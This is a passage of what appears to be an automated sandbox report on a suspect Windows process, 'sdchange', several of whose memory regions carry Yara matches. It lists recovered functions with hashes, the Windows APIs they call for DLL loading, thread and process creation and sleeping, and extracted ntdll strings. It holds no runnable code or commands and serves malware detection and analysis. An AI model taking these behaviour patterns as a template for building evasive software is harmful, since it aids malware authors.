                                                                            • String ID: @J7<
                                                                            • API String ID: 3442037557-2016760708
                                                                            • Opcode ID: 7d36fbb95e53387b192735bf30c1f40eb6bae60a8a5c384f12efbb0877c14a83
                                                                            • Instruction ID: 32487567572631ed6b79ddc0fa92149e8fc7a81c312e4cee4585b68325554451
                                                                            • Opcode Fuzzy Hash: 7d36fbb95e53387b192735bf30c1f40eb6bae60a8a5c384f12efbb0877c14a83
                                                                            • Instruction Fuzzy Hash: C2314FB6A1030AAFDF00DFD8D8809EEB7B9FF88304B108559E505EB214D771EE058BA1
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 030D3F3B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: wininet.dll
                                                                            • API String ID: 3472027048-3354682871
                                                                            • Opcode ID: 0a1b245ab2a77c5c43039cb045aa5c14517df60e9988c556fb0b7b6bdfd1659c
                                                                            • Instruction ID: 6b79d9984bdeddeffbaac0517893d96af86c6965574a507afad16344ca870c71
                                                                            • Opcode Fuzzy Hash: 0a1b245ab2a77c5c43039cb045aa5c14517df60e9988c556fb0b7b6bdfd1659c
                                                                            • Instruction Fuzzy Hash: 74317EB5A01309BBD714DF64C884FEBBBF8FB88710F14855DE9496B280D774AA40CBA5
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030C4942
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: 18d9689ef8b136b2521bd402d68eb4271b622a9e13267d14b467ee2ee30fe7b6
                                                                            • Instruction ID: 4c6d2f0cb33a5e3842de5063f8614f927aa5b7a91f74398589d9f17e1627cf66
                                                                            • Opcode Fuzzy Hash: 18d9689ef8b136b2521bd402d68eb4271b622a9e13267d14b467ee2ee30fe7b6
                                                                            • Instruction Fuzzy Hash: 3B011EB9E5134DABEF10DBE5DC41FDDB7B8AB44208F044195E9089B240F631E758CB91
                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,030C869E,00000010,?,?,?,00000044,?,00000010,030C869E,?,?,?), ref: 030D9D00
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: 7c8b464a843703bbec49435904aff0c5ce2251e1db31e27353c9d782aaa45bab
                                                                            • Instruction ID: c51de335a0a692a5261f334dadddb30d3996bea926babe8009bf268c6f73001e
                                                                            • Opcode Fuzzy Hash: 7c8b464a843703bbec49435904aff0c5ce2251e1db31e27353c9d782aaa45bab
                                                                            • Instruction Fuzzy Hash: 1E01C4B2205648BFCB44DE9DDC80EEB77ADAF8C714F018208BA09D7240D630F8518BA4
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030B9ED2
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: c7256101f11bf9f3aec988876ff7e269b3d0dfa625f948b33c6f6db0392d0e1b
                                                                            • Instruction ID: a4eeab810963e3c0e8631777e845c32385d19d6d09bc9a24d7a9466efbfe2371
                                                                            • Opcode Fuzzy Hash: c7256101f11bf9f3aec988876ff7e269b3d0dfa625f948b33c6f6db0392d0e1b
                                                                            • Instruction Fuzzy Hash: 2DF06D3738130436E220A5A9AC02FD7B79C8FC0BA1F184826F70CEF5C0D992B84187E8
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030B9ED2
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: 2458dd629e8c56071aa083e2214a5cedd2ae75a2931d036be57c3ec9cf623d87
                                                                            • Instruction ID: c91a4c6df385927b8cf651d78fedcc8859a8c2c19be0cb92da41a8a9ba51703a
                                                                            • Opcode Fuzzy Hash: 2458dd629e8c56071aa083e2214a5cedd2ae75a2931d036be57c3ec9cf623d87
                                                                            • Instruction Fuzzy Hash: 16F0923728130436E231A6999C02FD76B9C8FC0B51F184529F71CAF6C0D992B84187E8
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(030C1DA9,?,030D5D5E,030C1DA9,030D5A4E,030D5D5E,?,030C1DA9,030D5A4E,00001000,?,?,00000000), ref: 030D9BFC
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: e30b1026ecbcbb0e18fbdc03bfe93b109ace04a600ad3d0099f24d9eb94016cb
                                                                            • Instruction ID: 3a8363ef2e4cf3f6478a461a754408d1e3e6293fdfcd0c0efd328d96a293b939
                                                                            • Opcode Fuzzy Hash: e30b1026ecbcbb0e18fbdc03bfe93b109ace04a600ad3d0099f24d9eb94016cb
                                                                            • Instruction Fuzzy Hash: 06E0E5762403587BD614EE99DC46EDB77ACEFC9710F408519F909AB241D770B9108BB8
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFBFC95,00000007,00000000,00000004,00000000,030C4145,000000F4), ref: 030D9C4F
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: 0f8450adf8925460321119ba9bb7b8c5ca73b419a1b928270e2caa9687713646
                                                                            • Instruction ID: 895bd60d6ff24ddc611a6232c548c05073367f0486f66b614ef73084b7b7ae63
                                                                            • Opcode Fuzzy Hash: 0f8450adf8925460321119ba9bb7b8c5ca73b419a1b928270e2caa9687713646
                                                                            • Instruction Fuzzy Hash: 69E0E5B6340398BBD614EE99DC45EDB77ACEFC9710F108419FA09AB241D670B9108BB9
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 030C8709
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: e494b8f49d5241b52e5b2a7818939cf20cfe42a3dd1b9a145458aa9303ab63de
                                                                            • Instruction ID: 9551f062dcb8d1d97479ff5ff9bb77e47fe9437f2878f723a568b7a6f07307a5
                                                                            • Opcode Fuzzy Hash: e494b8f49d5241b52e5b2a7818939cf20cfe42a3dd1b9a145458aa9303ab63de
                                                                            • Instruction Fuzzy Hash: CDE0DF392103043AEA10A6A8EC89F6B33888B48720F088724F81C9B6E2F538E4028254
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,030C20A0,030D838E,030D5A4E,030C206D), ref: 030C8500
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: b99a2b17a602d3a5a1a5f5847fcfaee4629fdb6064706f84a1c5b9d85364e3a8
                                                                            • Instruction ID: be441c876ddb8d4560262b08ac616e8c105cb3bd999cc33c087aa5bc986d9849
                                                                            • Opcode Fuzzy Hash: b99a2b17a602d3a5a1a5f5847fcfaee4629fdb6064706f84a1c5b9d85364e3a8
                                                                            • Instruction Fuzzy Hash: 26E08C392843423FE355F7A4DC02F9A6AD95BC5640F0888A8EA48EB2C3DA62D5008295
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 030C8709
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 7b5b3c4728b12678dca47dc6b235be0fe356aee2c2d9798130a337f5789a88ca
                                                                            • Instruction ID: 517b7d0888619d18de4cd07e9181bbd10ce5b34b0171a069323820e3b7415d24
                                                                            • Opcode Fuzzy Hash: 7b5b3c4728b12678dca47dc6b235be0fe356aee2c2d9798130a337f5789a88ca
                                                                            • Instruction Fuzzy Hash: 48E026B815175035FB20A2646D89B6F33584F40320F2C8B14F82DAA1D2E024D0428304
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111), ref: 030C1187
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                            • Instruction ID: 2703ceb1d91a69539e9f38dd3b48bdc9ee318a4acc78a1068a4a8d6806b81c10
                                                                            • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                            • Instruction Fuzzy Hash: C6D0A77774110C35A60155846CC1CFEB75CDB845A5F004067FF08D1140D521490606B0
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,030C20A0,030D838E,030D5A4E,030C206D), ref: 030C8500
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 7276f3188d40b705f470631b47093e951d29d961259e623b333e21f3201b2689
                                                                            • Instruction ID: 02f9834c1fdd15d71229d4774eb4ecef2d93a2199427640264209a7b8f8e5c24
                                                                            • Opcode Fuzzy Hash: 7276f3188d40b705f470631b47093e951d29d961259e623b333e21f3201b2689
                                                                            • Instruction Fuzzy Hash: B2D05E796403053BE600F7A4DC03F9A36CD5B80B50F04C468F908EB2C3D965E51082A9
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 36b6ffa08da421a94f8b9933f800139269364087e6e30cc61376702c4e599e41
                                                                            • Instruction ID: 1a12862d337b777e2becd4f4cefd2aa127fab38bcfe1df93c7d19455a694c8bf
                                                                            • Opcode Fuzzy Hash: 36b6ffa08da421a94f8b9933f800139269364087e6e30cc61376702c4e599e41
                                                                            • Instruction Fuzzy Hash: 27B09B72D019D5C6FB11E7605A0871B7910BFD1711F56C061D3030686E4739D1D1E175
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2886136469.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_52d0000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1ba002c938994b5554a6283ef3f3c7471fc19f11e7bea809e2415195cca5c7c2
                                                                            • Instruction ID: becd062b37382f9bf97a7c7cc75eeac03e156753d536f7ce8fc4c8c368a574ba
                                                                            • Opcode Fuzzy Hash: 1ba002c938994b5554a6283ef3f3c7471fc19f11e7bea809e2415195cca5c7c2
                                                                            • Instruction Fuzzy Hash: 4141E97062DF0D8FD768EF6890856B6F3E6FF45310F50052DD98AC3262F670E8468695
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6aa2cc60c90f14bd3491c13878466b12cf4c6dea9fc1200f45e6cb4fbcfe8499
                                                                            • Instruction ID: 5f0c4beea2813c00c46f1347d763832cedb5058ab601257baae903443e693a37
                                                                            • Opcode Fuzzy Hash: 6aa2cc60c90f14bd3491c13878466b12cf4c6dea9fc1200f45e6cb4fbcfe8499
                                                                            • Instruction Fuzzy Hash: 58C02B13A5100400C1100C1C38843F0F73EC387131E0023D3EE48E3A018443F0830AC8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2886136469.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_52d0000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                            • API String ID: 0-3754132690
                                                                            • Opcode ID: f995138655b78f498d89d2ffc2d3d765cfe90b2b5d5e64d29202eccb2ef66a67
                                                                            • Instruction ID: a2d9e898fd0989fc89699ca50561a38ef69181d079409c5ee3045ec70f125453
                                                                            • Opcode Fuzzy Hash: f995138655b78f498d89d2ffc2d3d765cfe90b2b5d5e64d29202eccb2ef66a67
                                                                            • Instruction Fuzzy Hash: 45916FF04182948AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB95
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 5c1c821b79a750d43c86a6538bde549106fe8aaa12d66365759365a114d62c40
                                                                            • Instruction ID: 57f545f0d10517f42206bf08be57c2868d3361e4e5b66ca9557f5f8d47e9f3b3
                                                                            • Opcode Fuzzy Hash: 5c1c821b79a750d43c86a6538bde549106fe8aaa12d66365759365a114d62c40
                                                                            • Instruction Fuzzy Hash: F25105B2B00126BFDB20DF989C9097FF7B8BF08200B508169E565D7641E775EE01DBA0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 9562a0f37e012faa72a5101703ec4e5095ab242fd306416778be6e36e1d508a6
                                                                            • Instruction ID: 84ce5c9934a548d9ba5e8e499c24aef4beca4df5d95cb9ad4c8c09e3c824ab28
                                                                            • Opcode Fuzzy Hash: 9562a0f37e012faa72a5101703ec4e5095ab242fd306416778be6e36e1d508a6
                                                                            • Instruction Fuzzy Hash: 3E512AB9A00646AFDB30DF5CD8909BFBBFAFF44200B448459E8D6D7681D674EA40C760
                                                                            Strings
                                                                            • Execute=1, xrefs: 05024713
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05024655
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05024742
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 05024787
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 050246FC
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05024725
                                                                            • ExecuteOptions, xrefs: 050246A0
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 0-484625025
                                                                            • Opcode ID: 923e49d8289561f6573a216d414d89285ca9098e7010c56c4cedadd53a04a74f
                                                                            • Instruction ID: 0b2ea7c19593902c5a3467b619b944c44e84dd5c8172f2482c6daa96832899b1
                                                                            • Opcode Fuzzy Hash: 923e49d8289561f6573a216d414d89285ca9098e7010c56c4cedadd53a04a74f
                                                                            • Instruction Fuzzy Hash: EA51DA31A00219BBEF11BAA5ED45FFE77E8AF14705F0400A9D505A7190EB71BE478F51
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                            • Instruction ID: 4fc599c9a66dfa73f42d324b46366ab3e23ce782da9a397d96bf86196ca81470
                                                                            • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                            • Instruction Fuzzy Hash: 6D021370608341AFD345EF28D894E6EBBE5FFD8704F15892DB9858B264DB32E905CB42
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-$0$0
                                                                            • API String ID: 1302938615-699404926
                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                            • Instruction ID: 93fedc7a71d3f20d7434e2022efb15ebe830f5966065bc6e9f44fb87dcac7eec
                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                            • Instruction Fuzzy Hash: F081B071E052499FDF248E68CC917FEBBB2AF85350F184299DA51A72B0D734B843CB54
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$[$]:%u
                                                                            • API String ID: 48624451-2819853543
                                                                            • Opcode ID: 9ce8c424a81a79796fa331bb2b00d4f6e964711f2bae510d1fbd7b5c4e77d516
                                                                            • Instruction ID: 955c9c19b768ed4b7723b459e3c5af1b66da6169e412368af5b82e2caba77a25
                                                                            • Opcode Fuzzy Hash: 9ce8c424a81a79796fa331bb2b00d4f6e964711f2bae510d1fbd7b5c4e77d516
                                                                            • Instruction Fuzzy Hash: AF2153BAE0411AABDB10DF69DC54AFF77E9AF54644F480116E905E7240EB30EA428BA1
                                                                            Strings
                                                                            • RTL: Re-Waiting, xrefs: 0502031E
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 050202E7
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 050202BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                            • API String ID: 0-2474120054
                                                                            • Opcode ID: 6c65c48ce31e078471d0984e0aacf19ff556c366602ec7fc8d33b78e9dcfaab4
                                                                            • Instruction ID: 50a420b58dc5fdafcd85465b333419816dfc0de49080f1826debeb9d0a62768a
                                                                            • Opcode Fuzzy Hash: 6c65c48ce31e078471d0984e0aacf19ff556c366602ec7fc8d33b78e9dcfaab4
                                                                            • Instruction Fuzzy Hash: 14E1D031A087419FD724CF28D894F6AB7E2BF48314F180A6DF5968B2E0D775E846CB52
                                                                            Strings
                                                                            • RTL: Resource at %p, xrefs: 05027B8E
                                                                            • RTL: Re-Waiting, xrefs: 05027BAC
                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05027B7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 0-871070163
                                                                            • Opcode ID: 281b9d1056781d77724b467db8c1badd00e5938ea1f8a0536d878a43515aa0f1
                                                                            • Instruction ID: 947aba79afb0788608ba398391d279580c21a1b31bf03e5583b1501bfeae66bb
                                                                            • Opcode Fuzzy Hash: 281b9d1056781d77724b467db8c1badd00e5938ea1f8a0536d878a43515aa0f1
                                                                            • Instruction Fuzzy Hash: 6741F1317047429FDB24DE26DC41B6AB7E5FF88712F000A2DE95ADB290DB70F8068B91
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0502728C
                                                                            Strings
                                                                            • RTL: Resource at %p, xrefs: 050272A3
                                                                            • RTL: Re-Waiting, xrefs: 050272C1
                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05027294
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
